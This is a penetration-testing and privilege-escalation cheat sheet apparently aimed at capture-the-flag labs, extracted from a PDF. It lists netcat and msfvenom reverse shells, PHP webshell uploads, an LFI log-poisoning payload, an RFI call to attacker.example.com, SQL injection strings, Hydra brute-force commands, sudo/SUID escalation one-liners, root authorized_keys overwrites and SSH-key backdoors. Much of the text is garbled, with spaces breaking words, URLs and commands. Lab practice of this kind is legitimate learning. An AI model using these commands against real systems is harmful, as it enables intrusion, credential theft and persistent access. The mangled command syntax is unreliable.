Linux | Windows Privilege Escalation Cheat Sheet by blacklist_

Linux | Windows Privilege Escalation Cheat Sheetby blacklist_ via cheatography.com/121658/cs/22362/

HTTP Status Codes

Code(Gobuster)

Status

2XX Success This class of status codes indicates the action

requested by the client was received, understood andaccepted.

3XX Redirection This class of status code indicates the client must

take additional action to complete the request.

4XX Client Error This class of status code is intended for situations in

which the error seems to have been caused by theclient.

5xx Server Error

https: //w ww.r es tap itu tor ial.co m/h ttp sta tus cod es.html

Cyber Kill Chain

Usage Syntax

View SourceCode

Read it (enume rat ion /di rec tory) {{fa-bolt}Read hints Carefully and use find and locatecommand

Gobuster Dirb buster

Nmap Scan -A (aggre ssive) -p- (all ports)

Stegan ography https: //0 xri ck.g it hub.io /li sts /stego/

Ftp Penetr ation testing of ftp port.

It can be brute forced using hydra. ftp <ip add r> to connect and <ge t> files.

Think like anhacker

What can i do from here Where can i look (any hints given)

Cyber Kill Chain (cont)

CommonUserna ‐me/ Pas ‐sword

admin: admin admin: adm in123 admin: pas sword root:p ‐assword root:root and admin: fil eserver

Web shell Provides us to enable with remote admini str ation onthe target server We can add or modify some data (deface it) as a

webadmin. So after we get the web site admin access,our aim is to get web server access.

Inform ‐ationGathering

Search the website if it has blog post with namesthat can be used. Try to gather inform ation and thinkhow it can be used Try to think if you require a email what info can be

used to fetch a name or format on how email is beingused such as using inital s@d oma in_name

DirectoryEnumer ‐ationWordlists

Dirbuster medium Dirb common rockyou

SteghideandBinwalk

Binwalk is used on png and Steghide is used on jpg A png image can be used to hide binary files like zipwhereas jpg image can be used to hide a text file

Identifyhash

hashid 'hash' and ciphey tool

Terminatehashcatsession

rm -rf ~/.has hca t/s ess ion s/h ash cat.pid

Nmapscriptscans

nmap -sV -A --script vuln <ip>

JWTCRACK

hashcat -a 0 -m 16500 crack.txt /rockyou

By blacklist_cheatography.com/blacklist/

Not published yet.Last updated 27th February, 2021. of 25.

Sponsored by Readable.comMeasure your website readability!https://readable.com

http://www.cheatography.com/

http://www.cheatography.com/blacklist/

http://www.cheatography.com/blacklist/cheat-sheets/linux-windows-privilege-escalation

https://www.restapitutorial.com/httpstatuscodes.html

https://0xrick.github.io/lists/stego/


https://readable.com



HTTPrunning

dirb try HTTPS/ /<i p> robots.txt Pagesource

Wordpress https: //w ww.h ac kin gar tic les.in /wp sca nwo rdp res s-p ent est ing -fr ame work/ https: //b log.wp sca n.o rg/ ass ets /po sts /wp sca n-p ‐

ost ers /WP Sca n_C LI_ Che at_ She et.pdf

Wordpress -get reverseshell

Username enumer ation Brute force Password Login and upload shell to get session To upload PHP shell either upload it as a

PLUGIN or Edit Theme, exploitDB - PHP plugin ,MSF - PHP/re ver se_tcp and PHP reverse shell canbe uploaded https: //w ww.h ac kin gar tic les.in /wo rdp res s-r eve ‐

rse -shell/

File UploadBypass &PentestMonkeyShell

Intercept request > play with it and checkresponse is highly important Collection of Web-Shells Guides - Hacktricks bypass file upload & Hacker's

Grimoire Book We can use hacktr icks, first try out every single

extensions and then try double extens ions. Or useBurp Suite to bruteforce


BypassFileUpload

Download PHP pentest monkey rev shell rev shell with GIF89a on top Now change extension Upload it but wont execute Now upload again and intercept Intercept through Burp Edit the request and change that file to .gif.php Done just execute the shell through PATH Use nc to capture the connection

SpotDBusinSUIDfiles

Execute this command to replace replace current user.ssh private ket to root .ssh private key so we can login inssh as root gdbus call --system --dest com.ub unt u.U SBC reator --

obje ct-path /com/u bun tu/ USB Creator --method com.ub ‐unt u.U SBC rea tor.Image /home/ nad av/ aut hor ize d_keys/root/.ss h/a uth ori zed _keys true If we get ( ) as reply, it executed system call

DBus dbus is message bus system for usb controller basically send message of buses from one bus to

another If current user has SUID on DBUS it means that they

have executable rights over that command







https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/

https://blog.wpscan.org/assets/posts/wpscan-posters/WPScan_CLI_Cheat_Sheet.pdf

https://www.hackingarticles.in/wordpress-reverse-shell/

https://github.com/strawp/web-shells





Bruteforcevhosts /subdomainsusing FFUF

ffuf -w SecLis ts/ Dis cov ery /DN S/s ubd oma ins -to ‐p1m ill ion -50 00.txt -u http:/ /un dis cov ere d.thm/ -H " ‐Host: FUZZ.u ndi sco ver ed.t hm " -fc 302 ffuf -w /usr/s har e/w ord lis ts/ Sec Lis ts/ Dis cov ery /DN S/s ‐ubd oma ins -to p1m ill ion -20 000.txt -u http:/ /de liv ery.htb/-H " Host: FUZZ.d eli ver y.h tb" -fw 486 Wc is to filter with word. To learn more visit FFUF

Fuzzing Filtering

Brutef orcingdirectoryalong withextensions

gobuster dir -u <ip> -w /usr/s har e/w ord lis ts/ dir bus ‐ter /di rec tor y-l ist -2.3 -m edi um.txt -t 42 -x .bak,.php

Fuzzing vsBruteforce

Brute forcing is an attack method of just trying allpasswords, in a password brute force anyway.Fuzzing is a method of sending malformed orabnormal data to a service in an attempt to get it tomisbehave in some way, which could lead to thediscovery of vulner abi lities from denial of service,buffer overflows or remote code execution etc. FUZZcan be done for subdomains too, and sendingpayloads to find LFI or RCE etc..

Linux Escalation Techniques -> http:/ /xi phi asi lve r.n et/ 201 8/0 4/2 6/a ‐nno tat ion -ab usi ng- sud o-l inu x-p riv ile ge- esc ala tio n/# dis qus _thread

Web enumer ation -> https: //b erz erk 0.g ith ub.i o/ Git Pag e/C TF- Wri teu ‐ps/ Opt imu m-H TB.html

Cyber Kill Chain (Windows)

Usage Syntax

Nmap -> ServiceEnumer ation

The services running helps us in identi fyingour next steps Kerberos was running on port 88 so we

could launch a Kerberos pre authen tic ationattack If many services are running try

enum4linux Website upload shell and access it

nmap -sV --scri pt= ‐nfs -sh owmount <ta ‐rge t>

Nmap script scan and Nmap scan 2049(port no)

NFS (mount thedrive to access it)

Network File System permits a user on aclient machine to mount the shared files ordirect ories over a network. showmount -e <ta rge t>

Mount the contentof shared folder -t(type) nfs/iso

mount -t nfs ip:/dr ive _name /mnt/f old er_name There is a possib ility to access the root

folder by :/ and then navigate to other foldersuch as root There is a way to detach a busy device

immedi ately #umount -l and then delete thecontents

Google where doesCMS (umbraco)store creden tials

Appdat a/.sdf file extension normallycontain standard database files that storedata in a structured file format. cat Umbrac o.sdf | grep admin







https://cheatography.com/blacklist/cheat-sheets/linux-windows-privilege-escalation/%22http://undiscovered.thm/%22

https://cheatography.com/blacklist/cheat-sheets/linux-windows-privilege-escalation/%22http://delivery.htb/%22

https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480

http://xiphiasilver.net/2018/04/26/annotation-abusing-sudo-linux-privilege-escalation/#disqus_thread

https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html




Cyber Kill Chain (Windows) (cont)

Hashcat tocrackpasswordhash

hashcat -a 0 -m 100 crack.hash /usr/s har e/w ord lis ‐ts/ roc kyo u.txt

Wheneveryou getinterfacetry to finduploadpanel

Upload reverse shell then browse the directory toexecute it on the remote machine to get a reverse shell

Windowsreverseshellpayload

msfvenom -p window s/m ete rpr ete r/r eve rse_tcpLHOST= 10.1 0.1 4.89 LPORT=4455 -f exe > blackl ‐ist.exe Upload it

C:/Inetpub(cvebrowse toaccesspayoad) 'lsC:/'

Inetpub is the folder on a computer that is thedefault folder for Microsoft Internet Inform ationServices (IIS). The website content and web apps arestored in the inetpub folder — which keeps it organizedand secure.

Access thepayload

python exploit.py -u admin@ htb.local -p bacona ‐ndc heese -i 'http: //1 0.1 0.1 0.180' -c powers hel l.exe -a'C:/in etp ub/ www roo t/m edi a/1 034 /bl ack lis t.exe'

Listen forconnection

use exploi t/m ult i/h andler set payload payloa d/w ind ows /x6 4/s hel l_r eve ‐

rse_tcp

UploadWinpeasandaccessusing CVE

Privilege Escalation Awesome Scripts


winPEAS Applic ation area we can see Teamviewer andcheck it using shell Use metasploit to gain access to creden tials s run post/w ind ows /ga the r/c red ent ial s/t eam vie wer ‐

_pa sswords

Evil-Winrm: WinrmPentestingFramework

PS Remote shell hacking tool named as “Evil- ‐Winrm”. So we can say that it could be used in a post-e xpl oit ation hackin g/p ent esting phase. The purpose of this program is to provide nice and

easy-t o-use features for hacking.

Evil Winrm evil-winrm -u Admini strator -p '!R3m0te!' -i'10.10.10.180'

Enum4linux Enum4linux is an enumer ation tool capable ofdetecting and extracting data from Windows and Linuxoperating systems, including those that are Samba(SMB) hosts on a network. Enum4linux is capable ofdiscov ering the following: Password policies on atarget, The operating system of a remote target,Shares on a device (drives and folders), Domain andgroup member ship, User listings







mailto:[email protected]





GetNPUUser(impacketscript)

getnpu use rs.py <do mai n_n ame >/ -dc-ip <ip> getNPU use rs.py - Get users password hashes,

Supported in Kerberos protocol, Disable Kerberospre-auth it becomes vulner able, username andpassword are optional, Use this script to identifyvulnerable accounts

DomainController ,ActiveDirectory

A Windows Domain allows management of largecomputer networks They use a Windows server called a DC (domain

contro ller) A DC is any server that has Active Directory

domain services role DC respond to authen tic ation requests across the

domain DCs have the tool AD (active directory) and GP

(group policy) AD contains objects and OUs (Organ iza tional

Units) GP contains GPOs (Group Policy objects) that

manage settings for AD objects

KerberosCheatsheet

https: //g ist.gi thu b.c om/ Tar log icS ecu rit y/2 f22 192 4fe ‐f8c 14a 1d8 e29 f3c b5c5c4a

SMB (netbi ‐os-sn)

SMB ports are open. We need to do the usual tasks:check for anonymous login, list shares and checkpermis sions on shares.


SMBenumer ation

smbclient -L ip and access smbclient //192.1 68.1.1 ‐08 /sh are _name

Notes in Kali Windows Priv. Esc.

https: //g ith ub.c om /ca rlo spo lop /pr ivi leg e-e sca lat ion -aw eso me- scr ipt s-suite

https: //b ook.ha ckt ric ks.x yz /wi ndo ws/ act ive -di rec tor y-m eth odology

Reverse Shell & Exploi tation Techniques

Usage Syntax

Linux privilegecheatsheet

https: //g uid e.o ffs ecn ewb ie.c om /pr ivi ‐leg e-e sca lat ion /li nux -pe #cr on-jobs Hack tricks Hacking articles

OSCP Cheatsheet https: //l iod eus.gi thu b.i o/2 020 /09 /18 /OS ‐CP- per son al- che ats hee t.html

https: //v ulp 3cu la.g it boo k.i o/h ack ers -gr ‐imoire/

Linpeas, Linenum,Linux exploit suggestor

Linpeas - Hacktricks checklist SUID command - find / -perm -u=s -

type f 2>/ de v /null Sudo -l Cron jobs cat /etc/c rontab

Netcat nc -e /bin/sh <ip add> <po rt> (target)

nc -lvp <po rt> (host)

msfconsole |Cheatsheet

Power up metasploit Metasploit Cheatsheet Github Reverse shell msfconsole

use exploi t/< pat h> specify exploit to use

show options set the specific options

show target (set targetno)

set the specific target like power shell,PHP, python







https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

https://book.hacktricks.xyz/windows/active-directory-methodology

https://guide.offsecnewbie.com/privilege-escalation/linux-pe#cron-jobs

https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html

https://vulp3cula.gitbook.io/hackers-grimoire/

https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit




Reverse Shell & Exploi tation Techniques (cont)

connect tordp serviceusing rdpclient Windows

3389:RDP start Remmina to access then enter ip address then

enter userna me, domain and password

LinuxPrivilegeEscalation

SUIDbinary

find / -perm -u=s -type f 2>/ de v /null If you want to escalate privilege to another usersearch files that user owns there might be a cronjobthat executes his file and we can place reverse shell find / -type d -group <us er_ nam e> 2>/ dev /null/

CronJobs Trasnfer pspy64 through python server to findcronjobs

Sudo -l It show you what exact command you areauthorized to use

SuidbinaryAutomationScript

SUID3N UM.py Custom binary can be openedby reversing them using Ghidra

Addmachine IPto/etc/hosts

echo 10.10.1 94.183 spooky sec.local >> /etc/hosts


Cron Jobs(time- basedjobscheduler)

Mostly we try to add our reverse shell into the fileand CRON jobs executes the files and we get thereverse shell We can even try to change etc/hosts if the cron is

calling out to that IP we can change it and open aHTTP server on out machine and let him execute thescript with our own reverse shell

Exploitingsudo -l

commands - /var/w ww/gdb as www-data escalate privilege to a user thirtytwo then use GTFO sudo -u thirtytwo /var/w ww/gdb -nx -

ex '!sh' -ex quit

Exploitingsudo -l

(d4rckh) No paaswd: /usr/b it/git We have a user who can exec commands on that

path execute command to escalate sudo -u d4rckh /usr/b in/git -p help config !/bin/sh

Escalateprivilege viacronjob of apythonscript

https: //b log.ra zrs ec.u k/ try hac kme -ta rtarus/

ExploitingSUID

Find command which have SUID bit set whichmeans we can run find as root user. Using -exec flagas shown above. Let’s try out by changing thepermission of root directory. $ find . -exec chmod 777 /root \;







https://blog.razrsec.uk/tryhackme-tartarus/





Su VSSudo

Su is Permanent privilege escalation (su): It can beused to switch user accounts in the command linemode. Sudo is Temporary privilege escalation (sudo):

Switch the current user to the super user, then executethe command as the super user, and return to thecurrent user directly after the execution is completed. Sudo-Su-Working

Privilegeescalation2 ways

Privilege escalation using capabilities lPrivilege escalation using Python Library hijack

Upload tools and stuff - https: //p run e20 00.g it hub.io /po st/ upl oad -tools/

http:/ /pe nte stm onk ey.n et /ch eat -sh eet /sh ell s/r eve rse -sh ell -ch eat -sheet

Windows cmd commands

Discoverusers

net user

Read text file type root.txt

list directorycontent

dir

Changedirectory

cd

Read filepermissionand owner

Right click > Properties > Details > Owner Goto security tab > edit permission > Add > enter thename of user you want to give permission

UpgradeCommandShell toMeterp reter

sessions -u <no> or use use post/m ult i/m ana ge/ she ‐ll_ to_ met erp reter

Metasploitget hashes ofusers

hashdump

Linux Directory Structure

Directory Name Usage

When basic privesc doesnt worksearch thesedirect ories forJuice

/opt & /var -> www & log & backups. Makesure you review Linpeas properly such asReadable files belonging to root and readable byme but not world readable

/opt /opt is a directory for installing unbundledpackages (i.e. packages not part of the OperatingSystem distri bution, but provided by an indepe ‐ndent source), each one in its own subdir ectory. Sometimes, we can find config files over here,having creden tials. Thus its a Installed software locations, other dir.are /usr/l ocal.

/var /var contains things that are prone to change,such as websites, temporary files, config anddatabases.

/bin (systemcommands)

/bin contains execut ables which are required bythe system for emergency repairs, booting, andsingle user mode. /usr/bin contains any binaries that aren't required.

/usr/bin (execu ‐tablecommands)

This is the primary directory of executablecommands on the system.

/etc lookout for logs, backups, config files







https://www.programmersought.com/article/69434807416/

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8

https://prune2000.github.io/post/upload-tools/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet




OWASP TOP 10 and others

Vulner ‐ability - alongwith itsmitigation

Hunt down

SQLinjection

test' or 1=1; -- ' is used to close the query, ; is used to

terminate, -- is used to comment out rest For example ' --, creating a new account

blacklist' -- then can alter the query

Second -or der-SQL

What happens is there is a query like UPDATE users set passwo rd= "new pass" where

userna me= " bla cklist ' --" and passwo rd= "this is forcurrent passwo rd" Now when we use this query after -- becomes

just a comment which have no use now and it willdirectly changed the pass of old user

SQLMitigation

Parame terized Statem ents: Don't put the inputvariable directly into SQL statement, parse itseparately Vulnerable : " Select * From users WHERE email

= " " + email + " "; Sanitizing inputs

SSRF

LFI / RFI

S3 bucket

IDOR

Enumer ation Checklist

Usage Syntax

Attentionto detail

Is something wrong like text at the end Everything makes sense like password Lookout for possible usernames, directory, inform ation Focus should also be on unders tanding applic ation youare enumer ating and its working and what is going on Connect the Dots like telnet might be running an .exewhich is vulnerable to BoF

StartingEnumer ‐ation

ifconfig Host discovery : nmap -sn <ip >/24 Explore each service running and grab banners using

netcat : nc -nv <ip> <po rt> Finding if the service has any version based vulner ‐

ability or not via google and search sploit What do we have and what can be done ? like we

might have a directory already which can be further /-FUZZ- Pentest <se rvi ce> hacktricks / hackin gar ticles







http://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm




Enumer ation Checklist (cont)

HTTP /HTTPS80 &443

https robots.txt /* source code review directory enum vulner ability like LFI , SQL. Everyvulner ability has its indicators extension check Double /-FUZZ- on paths and parameter Play with Burp, request to understand applic ation flow &&Play with headers, x-forw ard ed-for can be used tobypass rate limit or IP ban

MorePort 80 /HTTPSchecklist

is it a CMS Nikto for web vulner ability scanning Discover if website /index.php or /index.html Id in URL- FUZZING can lead to dir. traversal or LFI If givendomain name try bruteforce subdomains / vhosts Wildguess : If there are 2 http ports open, one servicemight impact other, or leak inform ation. Login Form : Hunt for username, bruteforce, SQL

injection bypass on both User & Pass Parameter = admin'OR '1'='1;--+


FTP Anonymous login brute force CVE cd... dir useit returns a full directory listing whereas the ls -al returnshidden and simplified directory listing. Google Version forexploits or vulner ability PUT command files on the server and http server to trigger After login, which directory you are currently in , are the

files owned by root? Try cd ..

CMS Hunt for admin panel Login Panel - Default creds forthat service & small bruteforce for common creds test Aim for Usernames and Password Always read source,https , robots and dirb Always study that CMS like upload path and other

important directory names FUZZ for subdomains via ffuf Hunt CMS Version &

Search for Exploit / Vulner ability for that version











DirectoryEnumer ‐ation

gobuster dir -u http:/ /10.10.97.63/ -w /usr/s har e/w ‐ord lis ts/ raf t-l arg e-d ire cto rie s-l owe rca se.txt -t 40 -xphp,ba k,txt Always use raft and 2.3 medium wordlist for brutef ‐

orce. Remember to specify extension check. /example/{{fuzz}} : Remember to FUZZ double /di ‐

rectory too.

ServiceEnumer ‐ation

Enumerate the service Find login page like directory path for that service like where is the login page located Checkout Youtube and others for exploiting that

service

Enumer ‐ation tip

after getting shell as www - data always check/var/www and save current user private key /home/ pau ‐l/.s sh /id_rsa and we might be able to login as anotheruser directly

HTTPDirectoryEnumer ‐ation

3 Wordlists - common.txt, dirbus ter /di rec tor y-l ist -2.3 -m edi um.txt, seclis ts/ raf t-l arg e-d ire cto rie s-l owe rca se.txt dirsearch -u 10.0.2.19 -w /usr/s har e/w ord lis ts/ dir bus ‐

ter /di rec tor y-l ist -2.3 -m edi um.txt -e * -t 50


Database Penetr ‐ation Testing(SqlMap)

Always lookout for an id in the URL,vulnerable to SQL. which might be using adatabase sqlmap -u " htt p:/ /10.0.2.6 :80 80/ ‐mer cur yfa cts /1" --dbs --batch Guide-sqlmap

Enumerate login forms, id value, parametersfor SQL vulner ability via burp request orsqlmap

Upgrading aSimple Shells toFully Intera ctive(TTY)

python -c 'import pty; pty.sp awn ‐("/b in/ sh")'

Enumer ationScripts

LinEnum, Linpeas, LES , pspy64 or pspy32

Linux exploit suggestor

Netstat on thevictim machine

To view incoming and outgoing connectionand might find a port not coming up in scan netstat -tulpn

Sqlmap to performenumer ation(Banner Grabbing)

Capture burp request and test it on Loginforms Command: sqlmap -r .txt file_name --dbs

SQL - importantfiles (hackt ricks),cleartext .mysql _hi ‐story in /home dir

The output comes up with the list of databasesin the remote server. https: //w ww.n et spa rke r.c om/ blo g/w eb- sec uri ‐ty/ sql -in jec tio n-c hea t-s heet/

Cipher Identifierand Analyzer

https: //w ww.b ox ent riq.co m/c ode -br eak ing /ci ‐phe r-i den tifier

Password HashCracker

https: //c rac kst ati on.net/

Vigenere cipher(Long text vulner ‐able)

https: //w ww.g ub all a.d e/v ige ner e-s olver

All in one Decoder https: //g chq.gi thu b.i o/C ybe rChef/







http://10.10.97.63/

https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

https://www.boxentriq.com/code-breaking/cipher-identifier

https://crackstation.net/

https://www.guballa.de/vigenere-solver

https://gchq.github.io/CyberChef/





Cipher andHash identi ‐fic ation

https: //w ww.r ap idt abl es.c om /co nve rt/ num ber /as ‐cii -he x-b in- dec -co nve rte r.html ASCII RANGE 60-120,ABC HEX 41 42 Decimal and Binary Base64 number and upper and lower case MD5 lower case numbers and 32 in length

Find fileswithcommonextension

find / -name *.txt 2>/ dev /null

Hashcat The crypt formats all have a prefix $1$ is md5crypt, $2$ is bcrypt, $5$ is sha256 crypt,

$6$ is sha512 crypt Ciphey tool and hashcat wiki

Etc/ShadowFile

Unders tanding the /etc/s hadow File https: //l inu xiz e.c om/ pos t/e tc- sha dow -file/

THMCrypto ‐graphyRoom -RSA tool

link text PGP stands for Pretty Good Privacy. It’s a

software that implements encryption for encryptingfiles, performing digital signing and more. andSimilarly we have GPG open source and you candecrypt a file using gpg


Another tipfor serviceenum

Most of privilege escalation to users after www-datais through hash or some given pass, enumerate files ofthat service like where is the database files storedinside this service or where is the users info stored inthat service

Copy allfiles into asingle file

cat * > blackl ist.txt

LFI / RFIFinalCheatsheet,DetailedAttackVectors FileInclusion /Directorytraversal Payloadall theThings

Cheatsheet File Inclusion Attacks File Inclusion Hacktricks







https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html

https://linuxize.com/post/etc-shadow-file/

https://github.com/Ganapati/RsaCtfTool

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

https://medium.com/@asfiyashaikh10/file-path-traversal-and-file-inclusions-7c567da9e226

https://book.hacktricks.xyz/pentesting-web/file-inclusion





File InclusionsAttacks To expand, in anRFI attack, a hackeremploys a script toinclude a remotelyhosted file on thewebserver. In an LFIattack, a hackeruses local files toexecute a maliciousscript. For LFI, it ispossible for a hackerto only use a webbrowser to carry outthe attack.

On the other hand, Local File Inclusion(LFI) is very much similar to RFI. The onlydifference being that in LFI, in order to carryout the attack instead of including remotefiles, the attacker has to use local files i.efiles on the current server can only be usedto execute a malicious script. Since this formof vulner ability can be exploited with onlyusing a web browser, LFI can easily lead toremote code execution by including a filecontaining attack er- con trolled data such asthe web server’s access logs. like logposioning

Remote File Inclusion (RFI) is a methodthat allows an attacker to employ a script toinclude a remotely hosted file on thewebserver. The vulner ability promoting RFIis largely found on websites running on PHP.This is because PHP supports the ability to‘include’ or ‘require’ additional files within ascript. The use of unvali dated user-s uppliedinput within these scripts generally leads tothe exploi tation of this vulner abi lity.


LFI localfileinclusion

If you find paramter /index.ph p?plot= Try Fuzzing manually or Burp. LFI (local file inclusion)

is a vulner ability which an attacker can exploit to includ ‐e/read files. Therefore, whenever you see a PHP website try

FUZZING as these are sometimes vulnerable to LFI orRFI + Use Directory Traversal

LFIvulner ‐ability

Log Poisoning is a common technique used to gain areverse shell from a LFI vulner abi lity. To make it work anattacker attempts to inject malicious input to the serverlog. add the " ?pa ge= " parameter and let's try reading the

apache log file. The log file is located at the followingpath: /var/l og/ apa che 2/a cce ss.log Fire up Burpsuite and intercept the request and insert

the following malicious code in the user agent field (ThePHP command will allow us to execute systemcommands by parsing the input to a GET parametercalled lfi) The link becomes: http:/ /<I P>/ lfi /lf i.p hp? pag e=/ var /lo ‐

g/a pac he2 /ac ces s.l og&lfi= Now you can executecommands on the system!











Log poisoningattack vectorthrough LFI ispossible usingDirectory traversaland other wayslike SMTP

Forward the request and add yourparameter to the link (in my case lfi). User-A gent: Mozill a/5.0 <?php system ($_ ‐

GET ['l fi']); ?> Firefo x/68.0 lfi.ph p?p age =/v ar/ log /ap ach e2/ acc ess.lo g& ‐

lfi=cd /home;cd lfi/;cat flag.t xt;ls -lap;uname -r;ls -la

RFI/LFI (byspecifying path wecan even readuser and root flagif server is runningwith root permis ‐sions)

Lookout for parameters and To put itanother way. The page we’re looking at isactually empty; however, it’s including contentfrom another page Local File Inclusions are when that input

isn’t properly sanitised, allowing us tomanipulate the link to open other files. orincase of RFI we can supply an external URLand gain Shell

RFI http:/ /ex amp le.c om /?f ile =ht tp: //a tta cke r.e ‐xam ple.co m/e vil.php In this example, the malicious file is

included and run with the privileges of the userwho runs the web applic ation. That allows anattacker to run any code they want on the webserver. They can even gain a persistentpresence on the web server.


Exploit SUID &Backdoor

PATH of SUID binary and GTFO commandtogether to gain root access ssh-keygen .ssh/a uth -keys Leaving an SSH

key in author ize d_keys on a box can be auseful backdoor

Hash-id & CrackHash onlineotherwise usehashcat or JTR

MD5 Hashing Crack-Station

Hydra crack loginpage

Provide full path like /index.php mostlyotherwise it wont work When providing path test /index.php to

identify PHP is running hydra 10.10.1 0.227 -l admin -P /usr/s har ‐

e/w ord lis ts/ roc kyo u.txt http-p ost -form '/admi n/i ‐nde x.p hp: use r=a dmi n& pas s= : Use rnameor password invalid' -f

Sudo gives youpermission toexecute Scripts

Remove that script and replace with a shell

Brute force afteryou getusernames orpassword list hint

hydra, if you get usernames

Port Knocking : Ifyou see numbersas hint might beport knocking

Knock on the ports mentioned to openhidden ports for x in 1 3 5; do nmap -Pn --max- retries 0 -

p $x 10.10.6 3.86; done nmap -r -p1,3,5 10.10.1 7.17

SQL & XSSIndicators

For XSS, target Text boxes and URL, XSSmight also get triggered on another page, ForSQL test URL like Id or login pages.




PAS S




http://example.com/?file=http://attacker.example.com/evil.php

https://md5hashing.net/hash

https://crackstation.net/





SMTP Runs on Port 25, Nmap has scripts like --script smtp-c ‐ommands && google search with hacktricks and hackin gar ‐ticles for possible enumer ation techniques Understand the difference

139 & 445SMB , formore referhacktricks

Check null session, Shares list , Enum4linux enum4linux -a 10.0.2.19

Smbclient -L <ip> to list shares && -N to force withoutpassword && smbclient //< ip> /<s har e-n ame>

Enumer ation and Unders tanding of the scenario are very important aspects. Think if you need something like creden tials is there any way to access themfrom current options available.CRED ENT IALS

Linux Commands

CommandName

Syntax

Vim TextEditor

i for insert esc to exit insert :wq to quit and save :%d delete all lines

Hashcat(crackpasswordhash)

hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force

TransferFiles viaNc &Base64(movefiles)

On Victim : nc -nv 10.0.2.5 5555 < access.exe On Attacker : nc -nlvp 5555 > access.exe base64 <fi len ame> Save the encoding in a file base64 -d <fi len ame _ba se6 4_e nco din g>

Scp(securecopy files)

Want to receive files from target scp userna me@ rem ote :/f ile /to /send /where /to/put

Linux Commands (cont)

Gobuster(dir buster)

gobuster dir -u http://10.10.203.157:3333/ -w /usr/share/wordlists/dirb/common.txt

Processesrunning(underwhichuser)

ps aux

SUID (setowneruserIduponexecution)binary

find / -perm -u=s -type f 2>/ dev /null Instead of rwx -> rws. Example - the suid bit is set on binary file password as otheruser should be able to change their password but the user wont have direct access tothat file So it has root privileges

Burp Suite(checkacceptablefile ext)

By sending request to Intruder and then spider attack verify if the extension is acceptable or not Python script by importing request library can also be used

Wordcount(count theno of linesin a file)

wc -l yourTe xtFile

Whatweb whatweb <ip> The WhatWeb tool is used to identify different web techno logies used by thewebsite.

Fim (viewimagesfromterminal)

fim <im age _name)

Curl(changeuser agent(browsertyperendercontent)and followredire ‐ction)

curl -A " J" -L " htt p:/ /10.10.23 1.1 16"

Pythonserver totransferfiles fromremote tolocal

python3 -m http.s erver <po rt_ no> and access using the ip of remote machin e:port no







https://www.jscape.com/blog/smtp-vs-imap-vs-pop3-difference

http://10.10.203.157:3333/





Python serverto transfer filesfrom local toremote

wget http:/ /<u r-i p>: <po rt> /<f ile>

Extract zip 7z e <zi p_n ame.zi p>

Crack Zip locate zip2john zip2john <zi pfi le> > output.txt john output.txt fcrackzip -u backup s.zip -D -p /usr/s har e/w ord lis ‐ts/ roc kyo u.txt -v

Move multipleto directory

mv file1 file2 folder _name

Fuzz directory wfuzz -c -w common.txt --sc 200 -u " htt ‐p:/ /10.10.10.19 1/F UZZ.tx t" -t 100 wfuzz -z file,b ig.txt -d " bre ed= FUZ Z" -u http:/ /sh ‐ibe s.x yz/ api.php

Find flags .txt find / -type f -name 'user.txt' 2>/ dev /null

Hydra (bruteforce http postform)

hydra -L userna mes.txt -P passwo rds.txt 192.16 ‐8.2.62 http-p ost -form “/dvwa /lo gin.ph p:u ser nam e=

&pa ssw ord = & Log in= Log in: Login Failed” Specify the error at login failed

Hydra (bruteforce FTP)

hydra -l ftpuser -P passlist ftp:// 10.1 0.5 0.55

FTP bruteforce hydra -l chris -P /usr/s har e/w ord lis ts/ roc kyo u.txt -vV ftp:// 10.1 0.9 1.104

POP3bruteforce

hydra -l " bor is" -P /usr/s har e/w ord lis ts/ fas ttr ‐ack.txt -f 10.10.1 86.225 -s 55007 pop3 -V


John the ripper(crack ssh) VIA(private key passbrutef orce)

python /usr/s har e/j ohn /ss h2j ohn.py codes> crack.txt john --word lis t=/ roo t/D own loa ds/ roc kyo ‐

u.txt crack.txt

ssh (login throughprivate key)

ssh -i codes david@ 10.1 0.1 0.165 -p 22

SSH bruteforce forpassword

hydra -f -l john -P list ssh:// 10.1 0.2 4.200

Bruteforce JPG forhidden data(steghide pass)

stegcr acker file list.txt

TELNET intera ctingwith POP3

Connect to the mail server using Telnetwith the IP or DNS name of the server on port110 TELNET commands

PNG magic number& Hexedit

89 50 4E 47 0D 0A 1A 0A hexedit <fi le> hexedit ctrl+x - to save

Mysql cheatsheet MySQL Commands Use ; to terminate the mysql line

Find a specific filewith readablepermission

find / -type f -readable 2>/ dev /null | grepREADME.txt

Sudo -l execution (sly) /bin/cat /home/ sly /RE ADM E.txt sudo -u sly /bin/cat /home/ sly /RE ADM E.txt So you can see the user was able to

execute that command. We have to use sudospecify <us r> <binary path> <fi le> to execute

Nmap scanningworking

if u do this nmap -sC -sV -Pn ip, you cansee result if u do specif ically -p 1-100, it willshow their info, because they all are open




‐

USE R P ASS




http://shibes.xyz/api.php

ftp://10.10.50.55

ftp://10.10.91.104

mailto:[email protected]

ssh://10.10.24.200

https://www.vircom.com/blog/quick-guide-of-pop3-command-line-to-type-in-telnet/

http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm





To onlygrabbanners

nmap -p 1-100 <IP> --script banner Telnet is commun ication tool, it gets the banner or

the protocol info like if its http, it shows http info, if it isssh, it shows ssh rsa info

Escapeshells viaprogra ‐mming

Escaping shell via progra mming like ruby irb(main)

https: //m zfr.gi thu b.i o/l inu x-p riv-esc

https: //l inu xiz e.c om/ pos t/h ow- to- use -li nux -ft p-c omm and -to -tr ans fer -files/

